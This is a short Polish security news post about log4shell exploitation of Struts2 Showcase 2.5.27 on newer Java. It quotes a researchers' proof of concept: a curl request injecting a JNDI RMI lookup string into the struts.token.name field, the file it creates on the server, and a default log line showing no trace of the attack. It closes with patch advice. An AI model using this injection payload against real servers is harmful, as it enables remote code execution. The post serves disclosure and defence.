Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Popularna biblioteka Struts2 podatna na podatność log4shell. Najnowsza Java, atak w logach nie zostawia śladu…
Badacze zaprezentowali Proof of Concept exploit na Struts2 Showcase (2.5.27) z nową Javą:
root@c9b80b027e02:~# java -version openjdk version "11.0.13" 2021-10-19 OpenJDK Runtime Environment 18.9 (build 11.0.13+8) OpenJDK 64-Bit Server VM 18.9 (build 11.0.13+8, mixed mode, sharing)
Atak (uważni dostrzegą, że nie ma tutaj użycia ciągu ldap, jak w klasycznych atakach wykorzystujących log4shell)
wvu@kharak:~$ curl -vso /dev/null http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0.0.1:1099/ylbtsl}'
A ramach PoCa tworzony jest np. plik na serwerze:
root@c9b80b027e02:~# ls -l /tmp/vulnerable -rw-r----- 1 root root 0 Dec 10 22:21 /tmp/vulnerable
W trakcie takiego ataku oczywiście nic podejrzanego nie zostaje w (domyślnych) logach:
172.17.0.1 - - [10/Dec/2021:22:21:39 +0000] "POST /struts2-showcase/token/transfer4.action HTTP/1.1" 200 17976
Autorzy biblioteki jednocześnie ostrzegają:
Pamiętajcie że łatanie jest relatywnie proste (aktualizacja biblioteki log4j do wersji 2.15.0). Więcej szczegółów opisujemy tutaj.
~Michał Sajdak